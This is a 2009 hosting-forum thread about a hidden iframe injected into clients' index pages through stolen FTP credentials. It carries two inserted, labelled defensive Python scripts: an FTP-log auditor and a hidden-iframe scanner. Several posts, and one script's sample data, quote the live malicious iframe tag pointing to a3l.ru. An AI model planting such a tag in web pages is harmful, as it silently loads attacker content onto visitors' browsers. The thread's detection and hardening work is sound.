
02-07-2009, 11:19
new member
Join Date: Mar 2008
Posts: 3
All Sites Hacked - Iframe Added
We have had the following code added to all of our sites:
<iframe width="125" height="125" style="visibility: hidden;" src="http://a3l.ru:8080/ts/in.cgi?pepsi85">
It appears to have been added to all index files across all sites. I've manually removed it from all the important sites, but what caused this problem and how do I stop it happening again?
I'm guessing this is some kind of trojan horse? Has anybody else here been affected by this? I have seen posts online over the last 24 hours from other people who have been affected.
Any help much appreciated,
Mike

02-07-2009, 11:22
new member
Join Date: Mar 2008
Posts: 3
Scan
When I scan for trojans I get:
Appears Clean
/dev/stderr
Scanning for Trojan Horses.....
Possible Trojan - /usr/bin/cpan
Possible Trojan - /usr/bin/instmodsh
Possible Trojan - /usr/bin/prove
Possible Trojan - /usr/bin/pstruct
Possible Trojan - /usr/lib/python2.4/site-packages/libxml2mod.la
Possible Trojan - /usr/lib/python2.4/site-packages/libxml2mod.so
Possible Trojan - /usr/bin/gdlib-config
Possible Trojan - /usr/bin/xmlcatalog
Possible Trojan - /usr/bin/xmllint
Possible Trojan - /usr/sbin/antirelayd
Possible Trojan - /usr/bin/xml2-config
Possible Trojan - /usr/sbin/pureauth
Possible Trojan - /etc/cron.daily/logrotate
Possible Trojan - /usr/bin/annotate
Possible Trojan - /usr/bin/gd2togif
Possible Trojan - /usr/bin/gdcmpgif
Possible Trojan - /usr/bin/giftogd2
Possible Trojan - /usr/lib/libgd.so.2.0.0
18 POSSIBLE Trojans Detected

02-07-2009, 11:43
Moderator
Join Date: Aug 2007
Posts: 130
Quote:
Originally Posted by Emase
We have had the following code added to all of our sites:
<iframe width="125" height="125" style="visibility: hidden;" src="http://a3l.ru:8080/ts/in.cgi?pepsi85">
It appears to have been added to all index files across all sites. I've manually removed it from all the important sites, but what caused this problem and how do I stop it happening again?
I'm guessing this is some kind of trojan horse? Has anybody else here been affected by this? I have seen posts online over the last 24 hours from other people who have been affected.
Any help much appreciated,
Mike
Generally these types of iframe injections are done through ftp. You can check the ftp logs on your vps at /var/log/messages. It is recommended to keep strong passwords for your accounts and, if possible, to change the passwords frequently.
Feel free to open a ticket on our helpdesk regarding this issue.
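Reading /var/log/messages by eye is slow on a VPS with many accounts, so here is a Python script that does the review the moderator describes. It is an added example, not code from this forum, from eUKhost or from any poster. It parses pure-ftpd-style syslog lines (pure-ftpd is suggested by the pureauth entry in the scan output above, but the exact message wording, `is now logged in`, `Authentication failed for user [...]` and `... uploaded`, is an assumption to check against your own log), lists successful logins from addresses that are not on a whitelist, records whether each such login was preceded by failed attempts from the same address (a first-try success means the password was already known rather than guessed, the pattern a later post in this thread describes), lists index files uploaded during those sessions, and counts failures per address against a threshold like the one the firewall post at the end of the thread mentions. The log lines and the KNOWN_IPS set are constructed placeholders.

```python
import re
from collections import defaultdict

# Constructed sample log, modelled on pure-ftpd's syslog output as it appears in
# /var/log/messages on a cPanel VPS (assumption: compare the wording with your own log).
SAMPLE_LOG = """\
Jul  2 03:11:58 vps pure-ftpd: (?@203.0.113.5) [WARNING] Authentication failed for user [mike]
Jul  2 03:12:01 vps pure-ftpd: (?@203.0.113.5) [WARNING] Authentication failed for user [mike]
Jul  2 03:12:04 vps pure-ftpd: (?@203.0.113.5) [WARNING] Authentication failed for user [mike]
Jul  2 03:12:07 vps pure-ftpd: (?@203.0.113.5) [WARNING] Authentication failed for user [mike]
Jul  2 03:12:09 vps pure-ftpd: (?@203.0.113.5) [WARNING] Authentication failed for user [mike]
Jul  2 03:40:22 vps pure-ftpd: (?@198.51.100.77) [INFO] mike is now logged in
Jul  2 03:40:25 vps pure-ftpd: (?@198.51.100.77) [NOTICE] /home/mike/public_html/index.php uploaded  (2311 bytes, 41.2KB/sec)
Jul  2 03:40:26 vps pure-ftpd: (?@198.51.100.77) [NOTICE] /home/mike/public_html/blog/index.html uploaded  (1984 bytes, 39.0KB/sec)
Jul  2 10:05:13 vps pure-ftpd: (?@192.0.2.10) [INFO] mike is now logged in
Jul  2 10:06:40 vps pure-ftpd: (?@192.0.2.10) [NOTICE] /home/mike/public_html/images/logo.png uploaded  (5120 bytes, 120.0KB/sec)
"""

# Placeholder: addresses you or your staff legitimately connect from.
KNOWN_IPS = {"192.0.2.10"}

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ pure-ftpd: \(\?@(?P<ip>[\d.]+)\) "
    r"\[(?P<level>\w+)\] (?P<msg>.*)$"
)
LOGIN_RE = re.compile(r"^(?P<user>\S+) is now logged in$")
FAIL_RE = re.compile(r"^Authentication failed for user \[(?P<user>[^\]]+)\]$")
UPLOAD_RE = re.compile(r"^(?P<path>\S+) uploaded\b")


def parse_lines(text):
    """Turn raw log text into login / fail / upload events; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        msg = m.group("msg")
        event = {"ts": m.group("ts"), "ip": m.group("ip")}
        login, fail, upload = LOGIN_RE.match(msg), FAIL_RE.match(msg), UPLOAD_RE.match(msg)
        if login:
            event.update(kind="login", user=login.group("user"))
        elif fail:
            event.update(kind="fail", user=fail.group("user"))
        elif upload:
            event.update(kind="upload", path=upload.group("path"))
        else:
            continue
        events.append(event)
    return events


def audit(events, known_ips, fail_threshold=5):
    """Flag logins from unknown addresses (noting whether the address had failed
    before, i.e. guessed vs. already-known credentials), index files uploaded in
    those sessions, and addresses with fail_threshold or more failures."""
    fails = defaultdict(int)
    suspicious_ips = set()
    report = {"suspicious_logins": [], "index_uploads": [], "block_candidates": []}
    for ev in events:
        if ev["kind"] == "fail":
            fails[ev["ip"]] += 1
        elif ev["kind"] == "login" and ev["ip"] not in known_ips:
            suspicious_ips.add(ev["ip"])
            report["suspicious_logins"].append({
                "ts": ev["ts"], "user": ev["user"], "ip": ev["ip"],
                "first_try": fails[ev["ip"]] == 0,  # no guessing: the password was already known
            })
        elif ev["kind"] == "upload" and ev["ip"] in suspicious_ips:
            if ev["path"].rsplit("/", 1)[-1].lower().startswith("index."):
                report["index_uploads"].append((ev["ts"], ev["ip"], ev["path"]))
    report["block_candidates"] = sorted(ip for ip, n in fails.items() if n >= fail_threshold)
    return report


if __name__ == "__main__":
    result = audit(parse_lines(SAMPLE_LOG), KNOWN_IPS)
    for item in result["suspicious_logins"]:
        print("login", item)
    for ts, ip, path in result["index_uploads"]:
        print("index upload", ts, ip, path)
    print("block candidates", result["block_candidates"])
```

On a real box, feed it `grep pure-ftpd /var/log/messages` and put every address you normally connect from into KNOWN_IPS; a login marked first_try from an address you do not recognise is the signal to rotate that account's password and diff the uploaded files against a backup.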

02-07-2009, 20:21
Chief Marketing Officer
Join Date: Sep 2005
Posts: 5,641
Hi Mike,
We have disabled FTP access for the main cPanel user on our shared and reseller hosting servers due to the same problem. We have mod_security and some vulnerable PHP functions disabled on our servers. These 3 things are really important for the security of servers.
These b*lls**t marketing companies use these injections for promotion of their websites, but there is no way to stop them. Last time I screwed one marketing company that tried to inject the websites of our shared hosting customers, but taking that route every time is quite impossible.
You should open a ticket for our VPS Team and ask them to implement these 3 security settings on your VPS.
__________________
UK Web Hosting || Business Hosting || eUKhost Knowledgebase
Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________
Great Opportunity :: Join our Affiliate Program for FREE and earn 20% commission on each referral.

03-07-2009, 15:52
new member
Join Date: Jul 2009
Posts: 3
Hi, this page comes up first when you search for:
http//a3l.ru:8080/ts/in.cgi?pepsi85
so I figured I'll add what I found about this hack here for others to see. If you have more information about this, please register here and post (like I did).
First of all, this is a hack. It's done through somebody stealing your ftp credentials, then logging onto your site, searching for index.html and index.php files, and injecting the following code into them:
<iframe src="http://a3l.ru:8080/ts/in.cgi?pepsi85" width=125 height=125 style="visibility: hidden"></iframe>
I had it happen to 3 websites I own. When browsing through the ftp logs, I noticed somebody logging in with my user name and password and getting it right the first time, so it wasn't a brute force attack. Also, each of my websites had a different ftp username and password, which made it possible for me to find the culprit: I had all my ftp usernames and passwords stored in FileZilla FTP client's site manager.
After a bit of research, I found out that FileZilla doesn't encrypt the passwords when they're stored, so that's one way somebody could get to them, and then use one of the password recovery programs which can be found freely online.
A more likely way, however, is a trojan which installs itself on your computer and sniffs ftp packets, extracting passwords that way.
That means that no matter what ftp client you are using, your passwords will get stolen again unless you get rid of the trojan. I am still in the process of trying to track it down on my computers.
For now, I would suggest you change your ftp passwords and check all your index.html/ftp files for modification date, to make sure nobody added invisible iframes to them.
Here's more info on the packet sniffing trojan:
http://www.google.com/support/forum/p/Google+Analytics/thread?tid=1f6452112c01bb78&hl=en
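The check suggested in the post above (look through every index file for an invisible iframe and at its modification date) can be scripted. The Python script below is an added example, not code from this thread or from any poster. It walks a web root, normalises the curly quotes the forum rendered in the first post's tag, parses the attributes of every <iframe> tag, and reports tags that are hidden via `visibility: hidden` or `display: none` or sized to zero, together with index files modified within the last few days. The sample pages it writes into a scratch directory are constructed (one carries the injected tag quoted in this thread, the other a legitimate visible iframe); the set of index file names and the 7-day window are assumptions.

```python
import os
import re
import tempfile
import time

# Constructed sample pages: the first carries the tag quoted in this thread,
# the second a legitimate, visible iframe that must not be reported.
SAMPLE_INFECTED = (
    "<html><body><h1>Welcome</h1>\n"
    '<iframe width="125" height="125" style="visibility: hidden;" '
    'src="http://a3l.ru:8080/ts/in.cgi?pepsi85"></iframe>\n'
    "</body></html>\n"
)
SAMPLE_CLEAN = (
    '<html><body><iframe src="/player" width="640" height="360"></iframe></body></html>\n'
)

# Assumption: only these file names are checked, mirroring the posts above.
INDEX_NAMES = {"index.html", "index.htm", "index.php"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name=value pairs with double-quoted, single-quoted or bare values.
ATTR_RE = re.compile(r'''([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))''')
HIDDEN_STYLE_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
# Forum software (and some editors) turn straight quotes into curly ones.
SMART_QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"})


def parse_attrs(tag):
    """Map attribute names (lower-cased) to values for one tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value.strip()
    return attrs


def is_zero(value):
    """True for width/height values such as '0', '0px' or '0%'."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) == 0


def find_hidden_iframes(html):
    """Return (src, reason) for every iframe that a visitor would never see."""
    hits = []
    for m in IFRAME_RE.finditer(html.translate(SMART_QUOTES)):
        attrs = parse_attrs(m.group(0))
        reasons = []
        if HIDDEN_STYLE_RE.search(attrs.get("style", "")):
            reasons.append("hidden via style")
        if is_zero(attrs.get("width")) or is_zero(attrs.get("height")):
            reasons.append("zero-sized")
        if reasons:
            hits.append((attrs.get("src", ""), ", ".join(reasons)))
    return hits


def scan_tree(root, recent_days=7):
    """Walk root and report index files that contain hidden iframes or were
    modified within recent_days (the window is an assumption)."""
    cutoff = time.time() - recent_days * 86400
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower() not in INDEX_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read())
            recent = os.path.getmtime(path) > cutoff
            if hits or recent:
                findings.append({"path": path, "iframes": hits, "recently_modified": recent})
    return findings


def build_sample_tree():
    """Write the constructed pages into a scratch directory; the clean page is
    back-dated 30 days so only the injected one counts as recently modified."""
    root = tempfile.mkdtemp(prefix="iframe-scan-")
    os.makedirs(os.path.join(root, "site1", "public_html"))
    infected = os.path.join(root, "site1", "public_html", "index.php")
    clean = os.path.join(root, "index.html")
    with open(infected, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_INFECTED)
    with open(clean, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CLEAN)
    old = time.time() - 30 * 86400
    os.utime(clean, (old, old))
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f["path"], "recent" if f["recently_modified"] else "", f["iframes"])
```

Point scan_tree at /home (or the document root of each account) on the server rather than at the scratch tree; a file that shows up as recently modified with no hidden iframe still deserves a look, since the injected snippet could be placed in a different element than the one seen here.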

03-07-2009, 16:04
Moderator
Join Date: Aug 2007
Posts: 130
Quote:
After a bit of research, I found out that FileZilla doesn't encrypt the passwords when they're stored, so that's one way somebody could get to them, and then use one of the password recovery programs which can be found freely online.
It's not just FileZilla. The FTP protocol itself transmits the password in plain text. FTP, though efficient for transferring files, lacks any significant security features. The username, password, and file(s) are sent across the network unencrypted (i.e., in plaintext).

03-07-2009, 18:39
new member
Join Date: Jul 2009
Posts: 3
Quote:
Originally Posted by eukSam
It's not just FileZilla. The FTP protocol itself transmits the password in plain text. FTP, though efficient for transferring files, lacks any significant security features. The username, password, and file(s) are sent across the network unencrypted (i.e., in plaintext).
I was talking about the storage method of passwords on your local machine and not the actual protocol itself (which I also mentioned).
A quick search for FileZilla password recovery will show plenty of tools that simply extract that data.
Though as I said, the scope of these attacks suggests a network-sniffing trojan that extracts the passwords.

03-07-2009, 19:10
Chief Marketing Officer
Join Date: Sep 2005
Posts: 5,641
Quote:
Originally Posted by BinaryReason
I was talking about the storage method of passwords on your local machine and not the actual protocol itself (which I also mentioned).
A quick search for FileZilla password recovery will show plenty of tools that simply extract that data.
Though as I said, the scope of these attacks suggests a network-sniffing trojan that extracts the passwords.
You are absolutely right with your investigation.
FileZilla and older versions of other FTP software like WS_FTP Pro have this problem. One should never store FTP credentials in FTP software.
A notepad would be a safer option to store your passwords; never store your FTP login credentials in FTP software.

04-07-2009, 21:46
Junior Member
Join Date: Jun 2009
Posts: 22
I guess this is one big incentive to start using SFTP instead of FTP for file transfers. These kinds of attacks aren't new — people have known for years about FTP's vulnerabilities — which is one reason why a more secure alternative like SFTP was created.
Um... I do hope that eUKhost supports SFTP?

05-07-2009, 02:09
new member
Join Date: Jul 2009
Posts: 3
Quote:
Originally Posted by mitchell
I guess this is one big incentive to start using SFTP instead of FTP for file transfers. These kinds of attacks aren't new — people have known for years about FTP's vulnerabilities — which is one reason why a more secure alternative like SFTP was created.
Um... I do hope that eUKhost supports SFTP?
Amen to that. I just deleted FileZilla off all my computers; no more FTP clients for me. Am looking into SFTP right now.

05-07-2009, 09:59
Moderator
Join Date: Aug 2007
Posts: 130
Hello,
SFTP will be a good choice. SFTP is supported on all our Linux VPS and it uses the same port as SSH.

05-07-2009, 17:02
Junior Member
Join Date: Jun 2009
Posts: 25
I would actually focus more on securing your computer rather than switching FTP programs, as that trojan could have easily extracted more than just FTP passwords. A keylogger, for instance, could grant someone access to your PayPal account, hosting account and so on, so it's better to secure your computer first and then take further precautionary procedures.

05-07-2009, 19:23
Member
Join Date: Jun 2009
Posts: 75
When I see hackers breaking into things on shared servers, dedicated servers, VPS, anything, it really makes me wonder if they are even making the money for all the crap they are doing (wasting other people's time and money) for this stuff. I cannot think of the number of iframe injection issues I have read on webmaster forums.

05-07-2009, 21:50
Senior System Administrator
Join Date: Oct 2006
Posts: 364
Hello,
Making money is not the only thing for them. Basically, they think it's a game. They don't realize the impact. They do this for status, for fun, for vengeance, for guilt or for nothing.
Just like bank robbery, it looks cool to be in a gang, have an identity and get recognition for a skill. Hacking is a game to prove how smart you are. The more defenses, anti-virus, anti-spyware and firewalls you can destroy, the smarter you are. Hackers sometimes break in to fix systems which users forget to repair. They also alert users to security holes in their system. They can also repair systems from afar which other hackers have destroyed.
Sometimes they hack without any purpose, if they join a gang to see what it's like...
Unfortunately, hacking for good causes is rare.
But we have to find out a solution for every problem. Don't forget to keep a backup of your data all the time.
Hackers hack for a reason; it's mostly psychological.

06-07-2009, 00:01
Windows System Administrator
Join Date: Nov 2005
Location: Earth
Posts: 623
Quote:
Originally Posted by cranzi
When I see hackers breaking into things on shared servers, dedicated servers, VPS, anything, it really makes me wonder if they are even making the money for all the crap they are doing (wasting other people's time and money) for this stuff. I cannot think of the number of iframe injection issues I have read on webmaster forums.
Actually, the concept of hacking has been completely misunderstood today: a person who gets into your machine without authentication or permission is a cracker and not a hacker. Hackers are meant to find security vulnerabilities in an application and try to fix them, contributing towards the good faith of the community. Good hackers like Eric Steven Raymond do exist today who work for the good of this world.
What Shane said is very true: it is just to show your skills and get a position in your gang.

06-07-2009, 08:13
Junior Member
Join Date: Jun 2009
Posts: 25
Explain how switching FTP programs will prevent you from uploading nasties if you're just not aware of them?
As already pointed out, concentrate on securing your computer.

05-08-2009, 21:18
Senior Member
Join Date: Jul 2009
Posts: 119
Idiots they are
I was hacked today... twice in a row on a semi-dedicated VPS.
The system was restored and they hacked it again through the same root access.
It has caused me so much hassle it's unbelievable. These idiots seem to get pleasure out of ruining other people's reputations and wasting our time. I've got clients screaming at me because their 'emails are down again'.
I traced my hacker's IP address to Romania; if he was nearer and I could get hold of him I'd break his/her neck. It's hard enough keeping a business going and successful in the current economic climate as it is without some idiot, probably living off the state, hacking me twice in a row!

08-08-2009, 09:22
Junior Member
Join Date: Mar 2009
Location: Kent
Posts: 23
If you block IPs from Romania, won't that stop FTP from there too?

08-08-2009, 17:20
Senior Member
Join Date: Jul 2009
Posts: 119
Hi Paul,
The firewall blocks specific IP addresses which try more than x amount of times to get into the server.
This doesn't affect genuine ftp users from any particular country who SHOULD be accessing the server.